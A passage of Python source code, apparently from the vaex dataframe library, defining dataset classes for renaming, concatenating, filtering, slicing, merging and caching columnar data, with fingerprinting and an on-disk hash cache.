# if we don't have hashes for all columns, we just use the fingerprint
return hash(self.fingerprint)
return hash(tuple(self._ids.items()))
def _default_lazy_chunk_iterator(self, array_map, columns, chunk_size, reverse=False):
chunk_size = chunk_size or 1024**2
chunk_count = (self.row_count + chunk_size - 1) // chunk_size
chunks = range(chunk_count)
if reverse:
chunks = reversed(chunks)
for i in chunks:
i1 = i * chunk_size
i2 = min((i + 1) * chunk_size, self.row_count)
def reader(i1=i1, i2=i2):
chunks = {k: array_map[k][i1:i2] for k in columns}
length = i2 - i1
for name, chunk in chunks.items():
                    assert len(chunk) == length, f'Oops, got a chunk ({name}) of length {len(chunk)} while it is expected to be of length {length} (at {i1}-{i2})'
return chunks
yield i1, i2, reader
def _default_chunk_iterator(self, array_map, columns, chunk_size, reverse=False):
for i1, i2, reader in self._default_lazy_chunk_iterator(array_map, columns, chunk_size, reverse):
yield i1, i2, reader()
@abstractmethod
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
pass
@abstractmethod
def is_masked(self, column):
pass
@abstractmethod
def shape(self, column):
pass
@abstractmethod
def close(self):
'''Close file handles or other resources, the DataFrame will not be in a usable state afterwards.'''
pass
@abstractmethod
def slice(self, start, end):
pass
@abstractmethod
def hashed(self):
pass
@abstractmethod
def leafs(self) -> List["Dataset"]:
pass
class DatasetDecorator(Dataset):
def __init__(self, original):
super().__init__()
self.original = original
def leafs(self) -> List[Dataset]:
return self.original.leafs()
def close(self):
self.original.close()
def is_masked(self, column):
return self.original.is_masked(column)
def shape(self, column):
return self.original.shape(column)
class ColumnProxy(vaex.column.Column):
'''To give the Dataset._columns object useful containers for debugging'''
ds: Dataset
def __init__(self, ds, name, type):
self.ds = ds
self.name = name
self.dtype = type
def _fingerprint(self):
fp = vaex.cache.fingerprint(self.ds.fingerprint, self.name)
return f'column-proxy-{fp}'
def __len__(self):
return self.ds.row_count
def to_numpy(self):
values = self[:]
return np.array(values)
def __getitem__(self, item):
if isinstance(item, slice):
array_chunks = []
ds = self.ds.__getitem__(item)
for chunk_start, chunk_end, chunks in ds.chunk_iterator([self.name]):
ar = chunks[self.name]
if isinstance(ar, pa.ChunkedArray):
array_chunks.extend(ar.chunks)
else:
array_chunks.append(ar)
if len(array_chunks) == 1:
return array_chunks[0]
if len(array_chunks) == 0:
return vaex.dtype(self.dtype).create_array([])
return vaex.array_types.concat(array_chunks)
else:
raise NotImplementedError
@register
class DatasetRenamed(DatasetDecorator):
snake_name = 'rename'
def __init__(self, original, renaming):
super().__init__(original)
self.renaming = renaming
self.reverse = {v: k for k, v in renaming.items()}
self._create_columns()
self._ids = frozendict({renaming.get(name, name): ar for name, ar in original._ids.items()})
self._set_row_count()
def renamed(self, renaming):
        # {'a': 'x', 'b': 'y'} and {'x': 'a', 'b': 'z', 'c': 'q'} -> {'b': 'z', 'c': 'q'}
resulting = {}
renaming = renaming.copy() # we'll modify in place
for old, new in self.renaming.items():
if new in renaming:
if old == renaming[new]:
pass # e.g. x->a->x
else:
resulting[old] = renaming[new]
del renaming[new] # we already covered this
else:
# e.g. x->a->a
resulting[old] = new
# e.g. x->x->a
resulting.update(renaming)
return DatasetRenamed(self.original, resulting)
@property
def _fingerprint(self):
id = vaex.cache.fingerprint(self.original.fingerprint, self.renaming)
        return f'dataset-{self.snake_name}-{id}'
def _create_columns(self):
self._columns = frozendict({self.renaming.get(name, name): ar for name, ar in self.original.items()})
def _encode(self, encoding):
dataset_spec = encoding.encode('dataset', self.original)
return {'renaming': dict(self.renaming), 'dataset': dataset_spec}
@classmethod
def _decode(cls, encoding, spec):
dataset = encoding.decode('dataset', spec['dataset'])
return cls(dataset, spec['renaming'])
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
for name in columns:
if name in self.renaming:
rename = self.renaming[name]
raise KeyError(f'Oops, you tried to get column {name}, but you renamed it to {rename}')
columns = [self.reverse.get(name, name) for name in columns]
for i1, i2, chunks in self.original.chunk_iterator(columns, chunk_size, reverse=reverse):
yield i1, i2, {self.renaming.get(name, name): ar for name, ar in chunks.items()}
def is_masked(self, column):
return self.original.is_masked(self.reverse.get(column, column))
def shape(self, column):
return self.original.shape(self.reverse.get(column, column))
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
return type(self)(self.original.slice(start, end), self.renaming)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)(self.original.hashed(), self.renaming)
@register
class DatasetConcatenated(Dataset):
snake_name = "concat"
def __init__(self, datasets, resolver):
super().__init__()
self.datasets = datasets
self.resolver = resolver
if self.resolver == 'strict':
for dataset in datasets[1:]:
if set(dataset) != set(datasets[0]):
l = set(dataset)
r = set(datasets[0])
diff = l ^ r
raise NameError(f'Concatenating datasets with different names: {l} and {r} (difference: {diff})')
self._schema = datasets[0].schema()
self._shapes = datasets[0].shapes()
for dataset in datasets[1:]:
if dataset.shapes() != self._shapes:
raise ValueError(f'Cannot concatenate with different shapes: {self._shapes} != {dataset.shapes()}')
for dataset in datasets[1:]:
schema = dataset.schema()
                if schema != self._schema:
                    raise ValueError(f'Cannot concatenate with different schemas: {self._schema} != {schema}')
elif self.resolver == 'flexible':
schemas = [ds.schema() for ds in datasets]
shapes = [ds.shapes() for ds in datasets]
# try to keep the order of the original dataset
schema_list_map = {}
for schema in schemas:
for name, type in schema.items():
if name not in schema_list_map:
schema_list_map[name] = []
for name, type_list in schema_list_map.items():
for schema in schemas:
                    # None means the column is missing
type_list.append(schema.get(name))
from .schema import resolver_flexible
# shapes
shape_list_map = {}
for shape in shapes:
for name, type in shape.items():
if name not in shape_list_map:
shape_list_map[name] = []
for name, shape_list in shape_list_map.items():
for shapes_ in shapes:
                    # None means the column is missing
shape_list.append(shapes_.get(name))
self._schema = {}
self._shapes = {}
for name in shape_list_map:
self._schema[name], self._shapes[name] = resolver_flexible.resolve(schema_list_map[name], shape_list_map[name])
else:
raise ValueError(f'Invalid resolver {resolver}, choose between "strict" or "flexible"')
self._create_columns()
self._set_row_count()
@property
def _fingerprint(self):
ids = [ds.fingerprint for ds in self.datasets]
id = vaex.cache.fingerprint(*ids)
return f'dataset-{self.snake_name}-{id}'
def _create_columns(self):
columns = {}
hashes = {}
for name in self._schema:
columns[name] = ColumnProxy(self, name, self._schema[name])
if all(name in ds._ids for ds in self.datasets):
hashes[name] = hash_combine(*[ds._ids[name] for ds in self.datasets])
self._columns = frozendict(columns)
self._ids = frozendict(hashes)
def _encode(self, encoding, skip=set()):
datasets = encoding.encode_list('dataset', self.datasets)
spec = {'dataset_type': self.snake_name, 'datasets': datasets, 'resolver': self.resolver}
return spec
@classmethod
def _decode(cls, encoding, spec):
datasets = encoding.decode_list('dataset', spec['datasets'])
ds = cls(datasets, spec['resolver'])
return ds
def is_masked(self, column):
for dataset in self.datasets:
if column not in dataset:
return True
return any(k.is_masked(column) for k in self.datasets)
def shape(self, column):
return self._shapes[column]
def _set_row_count(self):
self._row_count = sum(ds.row_count for ds in self.datasets)
def schema(self, array_type=None):
return self._schema.copy()
def _chunk_iterator_non_strict(self, columns, chunk_size=None, reverse=False, start=0, end=None):
end = self.row_count if end is None else end
offset = 0
for dataset in self.datasets:
present = [k for k in columns if k in dataset]
# skip over whole datasets
if start >= offset + dataset.row_count:
offset += dataset.row_count
continue
# we are past the end
if end <= offset:
break
for i1, i2, chunks in dataset.chunk_iterator(present, chunk_size=chunk_size, reverse=reverse):
# chunks = {name: vaex.array_types.to_arrow(ar) for name, ar in chunks.items()}
length = i2 - i1
chunk_start = offset
chunk_end = offset + length
if start >= chunk_end: # we didn't find the beginning yet
offset += length
continue
if end <= chunk_start: # we are past the end
# assert False
break
if start > chunk_start:
# this means we have to cut off a piece of the beginning
if end < chunk_end:
# AND the end
length = end - chunk_start # without the start cut off
length -= start - chunk_start # correcting for the start cut off
assert length > 0
chunks = {name: vaex.array_types.slice(ar, start - chunk_start, length) for name, ar in chunks.items()}
for name, ar in chunks.items():
assert len(ar) == length, f'Oops, array was expected to be of length {length} but was {len(ar)}'
else:
length -= start - chunk_start # correcting for the start cut off
assert length > 0
chunks = {name: vaex.array_types.slice(ar, start - chunk_start) for name, ar in chunks.items()}
for name, ar in chunks.items():
assert len(ar) == length, f'Oops, array was expected to be of length {length} but was {len(ar)}'
else:
if end < chunk_end:
# we only need to cut off a piece of the end
length = end - chunk_start
assert length > 0
chunks = {name: vaex.array_types.slice(ar, 0, length) for name, ar in chunks.items()}
for name, ar in chunks.items():
assert len(ar) == length, f'Oops, array was expected to be of length {length} but was {len(ar)}'
from .schema import resolver_flexible
allchunks = {name: resolver_flexible.align(length, chunks.get(name), self._schema[name], self._shapes[name]) for name in columns}
yield {k: allchunks[k] for k in columns}
offset += (i2 - i1)
def chunk_iterator(self, columns, chunk_size=None, reverse=False, start=0, end=None):
chunk_size = chunk_size or 1024*1024
i1 = i2 = 0
if not columns:
end = self.row_count if end is None else end
yield from empty_chunk_iterator(start, end, chunk_size)
else:
chunk_iterator = self._chunk_iterator_non_strict(columns, chunk_size, reverse=reverse, start=start, end=self.row_count if end is None else end)
yield from _rechunk(chunk_iterator, chunk_size)
def close(self):
for ds in self.datasets:
ds.close()
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
# TODO: we can be smarter here, and trim off some datasets
return DatasetSliced(self, start=start, end=end)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)([dataset.hashed() for dataset in self.datasets], resolver=self.resolver)
def leafs(self) -> List[Dataset]:
return [self]
# def leafs(self) -> List[Dataset]:
# leafs = list()
# for ds in self.datasets:
# leafs.extend(ds.leafs())
# return leafs
@register
class DatasetTake(DatasetDecorator):
snake_name = "take"
def __init__(self, original, indices, masked):
super().__init__(original)
self.indices = indices
self.masked = masked
self._lazy_hash_index = None
self._create_columns()
self._set_row_count()
@property
def _fingerprint(self):
id = vaex.cache.fingerprint(self.original.fingerprint, self._hash_index, self.masked)
return f'dataset-{self.snake_name}-{id}'
@property
def _hash_index(self):
if self._lazy_hash_index is None:
self._lazy_hash_index = hash_array(self.indices)
return self._lazy_hash_index
def _create_columns(self):
# if the columns in ds already have a ColumnIndex
# we could do, direct_indices = df.column['bla'].indices[indices]
# which should be shared among multiple ColumnIndex'es, so we store
# them in this dict
direct_indices_map = {}
columns = {}
hashes = {}
for name, column in self.original.items():
columns[name] = ColumnIndexed.index(column, self.indices, direct_indices_map, masked=self.masked)
if name in self.original._ids:
hashes[name] = hash_combine(self._hash_index, self.original._ids[name])
self._columns = frozendict(columns)
self._ids = frozendict(hashes)
def _encode(self, encoding, skip=set()):
dataset_spec = encoding.encode('dataset', self.original)
spec = {'dataset_type': self.snake_name, 'dataset': dataset_spec}
spec['indices'] = encoding.encode('array', self.indices)
spec['masked'] = self.masked
return spec
@classmethod
def _decode(cls, encoding, spec):
dataset = encoding.decode('dataset', spec['dataset'])
indices = encoding.decode('array', spec['indices'])
ds = cls(dataset, indices, spec['masked'])
return ds
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
# TODO: we may be able to do this slightly more efficient by first
# materializing the columns
yield from self._default_chunk_iterator(self._columns, columns, chunk_size, reverse=reverse)
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
return DatasetSlicedArrays(self, start=start, end=end)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)(self.original.hashed(), self.indices, self.masked)
@register
class DatasetFiltered(DatasetDecorator):
snake_name = 'filter'
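# Decorator that exposes only the rows for which the boolean `filter` mask is
# True: `_row_count` is the number of True values and chunk_iterator applies
# the corresponding mask slice to every chunk. The dataframe state/selection
# that produced the filter can optionally be kept for re-encoding (see _encode).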
def __init__(self, original, filter, expected_length=None, state=None, selection=None):
super().__init__(original)
self._filter = filter
self._lazy_hash_filter = None
self._create_columns()
self._row_count = np.sum(self._filter).item()
self.state = state
self.selection = selection
if expected_length is not None:
if expected_length != self._row_count:
raise ValueError(f'Expected filter to have {expected_length} true values, but counted {self._row_count}')
@property
def _fingerprint(self):
id = vaex.cache.fingerprint(self.original.id, self._hash_index, self.state, self.selection)
return f'dataset-{self.snake_name}-{id}'
@property
def _hash_index(self):
if self._lazy_hash_filter is None:
self._lazy_hash_filter = hash_array(self._filter)
return self._lazy_hash_filter
def _create_columns(self):
columns = {name: vaex.dataset.ColumnProxy(self, name, data_type(col)) for name, col in self.original._columns.items()}
hashes = {}
for name, column in self.original.items():
if name in self.original._ids:
hashes[name] = hash_combine(self._hash_index, self.original._ids[name])
self._columns = frozendict(columns)
self._ids = frozendict(hashes)
def _encode(self, encoding, skip=set()):
dataset_spec = encoding.encode('dataset', self.original)
spec = {'dataset': dataset_spec}
if self.state is not None and self.selection is not None:
spec['state'] = encoding.encode('dataframe-state', self.state)
spec['selection'] = encoding.encode('selection', self.selection)
spec['filter_array'] = encoding.encode('array', self._filter)
return spec
@classmethod
def _decode(cls, encoding, spec):
dataset = encoding.decode('dataset', spec['dataset'])
if 'filter_array' in spec:
filter = encoding.decode('array', spec['filter_array'])
ds = cls(dataset, filter)
else:
state = encoding.decode('dataframe-state', spec['state'])
selection = encoding.decode('selection', spec['selection'])
df = vaex.from_dataset(dataset)
df.state_set(state)
df.set_selection(vaex.dataframe.FILTER_SELECTION_NAME, selection)
df._push_down_filter()
filter = df.dataset.filter
ds = cls(dataset, filter, state=state, selection=selection)
return ds
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
chunk_size = chunk_size or 1024**2
if not columns:
end = self.row_count
length = end
i1 = i2 = 0
i2 = min(length, i1 + chunk_size)
while i1 < length:
yield i1, i2, {}
i1 = i2
i2 = min(length, i1 + chunk_size)
return
def filtered_chunks():
for i1, i2, chunks in self.original.chunk_iterator(columns, chunk_size=chunk_size, reverse=reverse):
chunks_filtered = {name: vaex.array_types.filter(ar, self._filter[i1:i2]) for name, ar in chunks.items()}
yield chunks_filtered
yield from _rechunk(filtered_chunks(), chunk_size)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)(self.original.hashed(), self._filter)
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
expected_length = end - start
mask = vaex.superutils.Mask(memoryview(self._filter))
start, end = mask.indices(start, end-1)
end += 1
filter = self._filter[start:end]
assert filter.sum() == expected_length
return type(self)(self.original.slice(start, end), filter)
@register
class DatasetSliced(DatasetDecorator):
snake_name = "slice"
def __init__(self, original, start, end):
super().__init__(original)
self.start = start
self.end = end
self._row_count = end - start
self._create_columns()
# self._ids = {}
self._ids = frozendict({name: hash_slice(hash, start, end) for name, hash in original._ids.items()})
@property
def _fingerprint(self):
id = vaex.cache.fingerprint(self.original.fingerprint, self.start, self.end)
return f'dataset-{self.snake_name}-{id}'
def leafs(self) -> List[Dataset]:
# we don't want to propagate slicing
return [self]
def _encode(self, encoding, skip=set()):
dataset_spec = encoding.encode('dataset', self.original)
return {'dataset': dataset_spec, 'start': self.start, 'end': self.end}
@classmethod
def _decode(cls, encoding, spec):
dataset = encoding.decode('dataset', spec['dataset'])
return cls(dataset, spec['start'], spec['end'])
def _create_columns(self):
self._columns = {name: vaex.dataset.ColumnProxy(self, name, data_type(col)) for name, col in self.original._columns.items()}
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
yield from self.original.chunk_iterator(columns, chunk_size=chunk_size, reverse=reverse, start=self.start, end=self.end)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)(self.original.hashed(), self.start, self.end)
def slice(self, start, end):
length = end - start
start += self.start
end = start + length
if end > self.original.row_count:
raise IndexError(f'Slice end ({end}) is larger than number of rows: {self.original.row_count}')
return type(self)(self.original, start, end)
@register
class DatasetSlicedArrays(DatasetDecorator):
snake_name = 'slice_arrays'
def __init__(self, original, start, end):
super().__init__(original)
# maybe we want to avoid slicing twice, and collapse it to 1?
self.start = start
self.end = end
# TODO: this is the old dataframe.trim method, we somehow need to test/capture that
# if isinstance(column, array_types.supported_array_types): # real array
# df.columns[name] = column[self._index_start:self._index_end]
# else:
# df.columns[name] = column.trim(self._index_start, self._index_end)
self._create_columns()
self._ids = frozendict({name: hash_slice(hash, start, end) for name, hash in original._ids.items()})
self._set_row_count()
@property
def _fingerprint(self):
id = vaex.cache.fingerprint(self.original.fingerprint, self.start, self.end)
return f'dataset-{self.snake_name}-{id}'
def leafs(self) -> List[Dataset]:
# we don't want to propagate slicing
return [self]
def _create_columns(self):
columns = {}
for name, column in self.original.items():
if isinstance(column, array_types.supported_array_types): # real array
column = column[self.start:self.end]
else:
column = column.trim(self.start, self.end)
columns[name] = column
self._columns = frozendict(columns)
def _encode(self, encoding, skip=set()):
dataset_spec = encoding.encode('dataset', self.original)
return {'dataset': dataset_spec, 'start': self.start, 'end': self.end}
@classmethod
def _decode(cls, encoding, spec):
dataset = encoding.decode('dataset', spec['dataset'])
return cls(dataset, spec['start'], spec['end'])
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
yield from self._default_chunk_iterator(self._columns, columns, chunk_size, reverse=reverse)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)(self.original.hashed(), self.start, self.end)
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
length = end - start
start += self.start
end = start + length
if end > self.original.row_count:
raise IndexError(f'Slice end ({end}) is larger than number of rows: {self.original.row_count}')
return type(self)(self.original, start, end)
@register
class DatasetDropped(DatasetDecorator):
snake_name = "drop"
def __init__(self, original, names):
super().__init__(original)
self._dropped_names = tuple(names)
self._create_columns()
self._ids = frozendict({name: ar for name, ar in original._ids.items() if name not in names})
self._set_row_count()
def dropped(self, *names):
return DatasetDropped(self.original, self._dropped_names + names)
@property
def _fingerprint(self):
id = vaex.cache.fingerprint(self.original.fingerprint, self._dropped_names)
return f'dataset-{self.snake_name}-{id}'
def _create_columns(self):
self._columns = frozendict({name: ar for name, ar in self.original.items() if name not in self._dropped_names})
def _encode(self, encoding):
dataset_spec = encoding.encode('dataset', self.original)
return {'dataset': dataset_spec, 'names': list(self._dropped_names)}
@classmethod
def _decode(cls, encoding, spec):
dataset = encoding.decode('dataset', spec['dataset'])
ds = cls(dataset, spec['names'])
return ds
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
for column in columns:
if column in self._dropped_names:
raise KeyError(f'Oops, you tried to get column {column} while it is actually dropped')
yield from self.original.chunk_iterator(columns, chunk_size=chunk_size, reverse=reverse)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)(self.original.hashed(), self._dropped_names)
def close(self):
self.original.close()
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
return type(self)(self.original.slice(start, end), self._dropped_names)
@register
class DatasetMerged(Dataset):
snake_name = "merge"
def __init__(self, left, right):
super().__init__()
self.left = left
self.right = right
if self.left.row_count != self.right.row_count:
raise ValueError(f'Merging datasets with unequal row counts ({self.left.row_count} != {self.right.row_count})')
self._row_count = self.left.row_count
overlap = set(left) & set(right)
if overlap:
raise NameError(f'Duplicate names: {overlap}')
self._create_columns()
self._ids = frozendict({**left._ids, **right._ids})
self._set_row_count()
@property
def _fingerprint(self):
id = vaex.cache.fingerprint(self.left.fingerprint, self.right.fingerprint)
return f'dataset-{self.snake_name}-{id}'
def leafs(self) -> List[Dataset]:
return self.left.leafs() + self.right.leafs()
def _create_columns(self):
# TODO: for DatasetArray, we might want to just do this?
# self._columns = frozendict({**left._columns, **right._columns})
self._columns = {**{name: ColumnProxy(self.left, name, data_type(col)) for name, col in self.left._columns.items()},
**{name: ColumnProxy(self.right, name, data_type(col)) for name, col in self.right._columns.items()}}
def _encode(self, encoding, skip=set()):
dataset_spec_left = encoding.encode('dataset', self.left)
dataset_spec_right = encoding.encode('dataset', self.right)
spec = {'left': dataset_spec_left, 'right': dataset_spec_right}
return spec
@classmethod
def _decode(cls, encoding, spec):
left = encoding.decode('dataset', spec['left'])
right = encoding.decode('dataset', spec['right'])
ds = cls(left, right)
return ds
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
columns_left = [k for k in columns if k in self.left]
columns_right = [k for k in columns if k in self.right]
if not columns_left:
yield from self.right.chunk_iterator(columns, chunk_size, reverse=reverse)
elif not columns_right:
yield from self.left.chunk_iterator(columns, chunk_size, reverse=reverse)
else:
for (i1, i2, ichunks), (j1, j2, jchunks) in zip(
self.left.chunk_iterator(columns_left, chunk_size, reverse=reverse),
self.right.chunk_iterator(columns_right, chunk_size, reverse=reverse)):
# TODO: if one of the datasets does not respect the chunk_size (e.g. parquet)
# this might fail
assert i1 == j1
assert i2 == j2
yield i1, i2, {**ichunks, **jchunks}
def is_masked(self, column):
if column in self.left:
return self.left.is_masked(column)
else:
return self.right.is_masked(column)
def shape(self, column):
if column in self.left:
return self.left.shape(column)
else:
return self.right.shape(column)
def hashed(self):
if set(self._ids) == set(self):
return self
return type(self)(self.left.hashed(), self.right.hashed())
def close(self):
self.left.close()
self.right.close()
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
return type(self)(self.left.slice(start, end), self.right.slice(start, end))
@register
class DatasetArrays(Dataset):
snake_name = "arrays"
def __init__(self, mapping=None, hashed=True, **kwargs):
super().__init__()
if mapping is None:
mapping = {}
columns = {**mapping, **kwargs}
columns = {key: to_supported_array(ar) for key, ar in columns.items()}
# TODO: we finally want to get rid of datasets with no columns
self._columns = frozendict(columns)
if hashed:
self._ids = frozendict({key: hash_array(array) for key, array in self._columns.items()})
else:
self._ids = frozendict()
self._set_row_count()
@property
def id(self):
try:
# requires hashing and is expensive
return self.fingerprint
except ValueError:
return f'dataset-{self.snake_name}-uuid4-{self._id}'
@property
def _fingerprint(self):
keys = set(self)
keys_hashed = set(self._ids)
missing = keys ^ keys_hashed
if missing:
# if we don't have hashes for all columns, we do it like id
return f'dataset-{self.snake_name}-uuid4-{self._id}'
# self.__hash__() # invoke just to check we don't have missing hashes
# but Python's hash functions are not deterministic (across processes)
fp = vaex.cache.fingerprint(tuple(self._ids.items()))
return f'dataset-{self.snake_name}-hashed-{fp}'
def leafs(self) -> List[Dataset]:
return [self]
def _encode(self, encoding):
arrays = encoding.encode_dict('array', self._columns)
spec = {'dataset_type': self.snake_name, 'arrays': arrays}
if self._ids:
fingerprints = dict(self._ids)
spec['fingerprints'] = fingerprints
return spec
@classmethod
def _decode(cls, encoding, spec):
arrays = encoding.decode_dict('array', spec['arrays'])
ds = cls(arrays)
if 'fingerprints' in spec:
ds._ids = frozendict(spec['fingerprints'])
return ds
def __getstate__(self):
state = self.__dict__.copy()
# here, we actually DO want to keep the columns
# del state['_columns']
return state
def __setstate__(self, state):
super().__setstate__(state)
def _create_columns(self):
pass
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
yield from self._default_chunk_iterator(self._columns, columns, chunk_size, reverse=reverse)
def is_masked(self, column):
ar = self._columns[column]
if not isinstance(ar, np.ndarray):
ar = ar[0:1] # take a small piece
if isinstance(ar, np.ndarray):
return np.ma.isMaskedArray(ar)
else:
return False # an arrow array always has null value options
def shape(self, column):
ar = self._columns[column]
if not isinstance(ar, np.ndarray):
ar = ar[0:1] # take a small piece
if isinstance(ar, vaex.array_types.supported_arrow_array_types):
return tuple()
else:
return ar.shape[1:]
def merged(self, rhs):
# TODO: if we don't allow empty datasets, we can remove this method
if len(self) == 0:
return rhs
if len(rhs) == 0:
return self
# TODO: this is where we want to check if both are array like
# and have faster version of merged
return DatasetMerged(self, rhs)
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
return DatasetSlicedArrays(self, start=start, end=end)
def hashed(self):
if set(self._ids) == set(self):
return self
new = type(self)(self._columns)
new._ids = frozendict({key: hash_array(array) for key, array in new._columns.items()})
return new
def close(self):
pass # nothing to do, maybe drop a refcount?
# TODO: we might want to really get rid of these, since we want to avoid copying them over the network?
# def dropped(self, names):
class DatasetFile(Dataset):
"""Datasets that map to a file can keep their ids/hashes in the file itself,
or keep them in a meta file.
"""
def __init__(self, path, write=False, fs_options={}, fs=None):
super().__init__()
self.path = path
self.fs_options = fs_options
self.fs = fs
self.write = write
self._columns = {}
self._ids = {}
self._frozen = False
self._hash_calculations = 0 # track it for testing purposes
self._hash_info = {}
self._hash_cache_needs_write = False
self._read_hashes()
@property
def name(self):
base, ext, fs_options = vaex.file.split_ext(self.path)
base = os.path.basename(base)
return base
@property
def _fingerprint(self):
if set(self._ids) == set(self):
fingerprint = vaex.cache.fingerprint(dict(self._ids))
return f'dataset-{self.snake_name}-hashed-{fingerprint}'
else:
# TODO: if the dataset is hashed, return a fingerprint based on that
fingerprint = vaex.file.fingerprint(self.path, fs_options=self.fs_options, fs=self.fs)
return f'dataset-{self.snake_name}-{fingerprint}'
def leafs(self) -> List[Dataset]:
return [self]
def _create_columns(self):
pass
@classmethod
def quick_test(cls, path, fs_options={}, fs=None, *args, **kwargs):
return False
@classmethod
def open(cls, path, *args, **kwargs):
return cls(path, *args, **kwargs)
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
yield from self._default_chunk_iterator(self._columns, columns, chunk_size, reverse=reverse)
def is_masked(self, column):
ar = self._columns[column]
if not isinstance(ar, np.ndarray):
ar = ar[0:1] # take a small piece
if isinstance(ar, np.ndarray):
return np.ma.isMaskedArray(ar)
else:
return False # an arrow array always has null value options
def shape(self, column):
ar = self._columns[column]
if not isinstance(ar, np.ndarray):
ar = ar[0:1] # take a small piece
if isinstance(ar, vaex.array_types.supported_arrow_array_types):
return tuple()
else:
return ar.shape[1:]
def slice(self, start, end):
if start == 0 and end == self.row_count:
return self
return DatasetSlicedArrays(self, start=start, end=end)
def _read_hashes(self):
path_hashes = Path(self.path + '.d') / 'hashes.yaml'
try:
exists = path_hashes.exists()
except OSError: # happens for windows py<38
exists = False
if exists:
with path_hashes.open() as f:
hashes = vaex.utils.yaml_load(f)
if hashes is None:
raise ValueError(f'{path_hashes} was probably truncated due to another process writing.')
self._hash_info = hashes.get('columns', {})
def _freeze(self):
self._ids = frozendict(self._ids)
self._columns = frozendict(self._columns)
self._set_row_count()
self._frozen = True
if self._hash_cache_needs_write:
self._write_hash_info()
def encode(self, encoding, skip=set()):
spec = {'dataset_type': self.snake_name,
'write': self.write,
'path': self.path,
'fs_options': self.fs_options,
'fs': self.fs}
return spec
def __getstate__(self):
# we don't have the columns in the state, since we should be able
# to get them from disk again
return {
'write': self.write,
'path': self.path,
'fs_options': self.fs_options,
'fs': self.fs,
'_ids': dict(self._ids)  # serialize the hashes as a non-frozen dict
}
def __setstate__(self, state):
super().__setstate__(state)
# 'ctor' like initialization
self._frozen = False
self._hash_calculations = 0
self._columns = {}
self._hash_info = {}
self._hash_cache_needs_write = False
self._read_hashes()
def add_column(self, name, data):
self._columns[name] = data
if self.write:
return # the columns don't include the final data
# the hashes will be done in .freeze()
hash_info = self._hash_info.get(name)
if hash_info:
hash_info_previous = hash_info.copy()
hash, hash_info = hash_array(data, hash_info, return_info=True)
if hash_info_previous != hash_info:
self._hash_cache_needs_write = True
self._ids[name] = hash
self._hash_info[name] = hash_info # always update the information
@property
def _local_hash_path(self):
# TODO: support s3 and gcs
# TODO: fallback directory when a user cannot write
if Path(self.path).exists():
directory = Path(self.path + '.d')
directory.mkdir(exist_ok=True)
else:
o = urlparse(self.path)
directory = Path(vaex.utils.get_private_dir('dataset', o.scheme, o.netloc, o.path[1:]))
return directory / 'hashes.yaml'
def hashed(self):
if set(self._ids) == set(self):
return self
cls = type(self)
# use pickle protocol to clone
new = cls.__new__(cls)
new.__setstate__(self.__getstate__())
hashes = {}
disk_cached_hashes = {}
for name, column in new.items():
hash_info = self._hash_info.get(name)
if hash_info is None:
logging.warning(f'Calculating hash for column {name} of length {len(column)} (1 time operation, will be cached on disk)')
hash_info = hash_array_data(column)
hash, hash_info = hash_array(column, hash_info, return_info=True)
new._hash_calculations += 1
hashes[name] = hash
disk_cached_hashes[name] = hash_info
new._ids = frozendict(hashes)
new._hash_info = frozendict(disk_cached_hashes)
path_hashes = new._local_hash_path
# TODO: without this check, if multiple processes are writing (e.g. tests/execution_test.py::test_task_sum with ray)
# this leads to a race condition, where we write the file, and while it is truncated, _read_hashes() fails (because the file exists)
# if new._hash_info != new._ids:
new._write_hash_info()
return new
def _write_hash_info(self):
if self._hash_info: # TODO: file lock
path_hashes = self._local_hash_path
with path_hashes.open('w') as f:
vaex.utils.yaml_dump(f, {'columns': dict(self._hash_info)})
class DatasetCached(DatasetDecorator):
snake_name = "cached"
shared_cache = {}
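# Decorator that caches chunks of the columns listed in `names`, either in the
# class-level `shared_cache` dict or in a user-supplied cache, keyed by
# f"{fingerprint}-{column}" (see _cache_key). Cached columns are served from
# the cache, the remaining columns are read from the wrapped dataset, and the
# two chunk streams are zipped back together in chunk_iterator.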
def __init__(self, original, names, cache=None, to_numpy=False):
super(DatasetCached, self).__init__(original)
self.original = original
self.names = names
self._shared = cache is None or cache is self.shared_cache
self.cache = cache if cache is not None else self.shared_cache
self.to_numpy = to_numpy
self._create_columns()
self._row_count = self.original.row_count
@property
def _fingerprint(self):
return self.original.fingerprint
def _create_columns(self):
columns = {}
schema = self.original.schema()
for name, column in self.original.items():
columns[name] = ColumnProxy(self, name, schema[name])
self._columns = frozendict(columns)
self._ids = frozendict(self.original._ids)
def _encode(self, encoding, skip=set()):
raise NotImplementedError("cannot serialize cache")
@classmethod
def _decode(cls, encoding, spec):
raise NotImplementedError("cannot serialize cache")
def chunk_iterator(self, columns, chunk_size=None, reverse=False):
chunk_size = chunk_size or chunk_size_default
columns_all = set(columns)
columns_cachable = columns_all & set(self.names)
# avoids asking the cache twice, by using .get() and then testing for None
columns_cached = {name: self.cache.get(self._cache_key(name)) for name in columns_cachable}
columns_cached = {name: array for name, array in columns_cached.items() if array is not None}
columns_to_cache = columns_cachable - set(columns_cached)
column_required = columns_all - set(columns_cached)
cache_chunks = {name: [] for name in columns_to_cache}
def cached_iterator():
chunks_list = [chunks for name, chunks in columns_cached.items()]
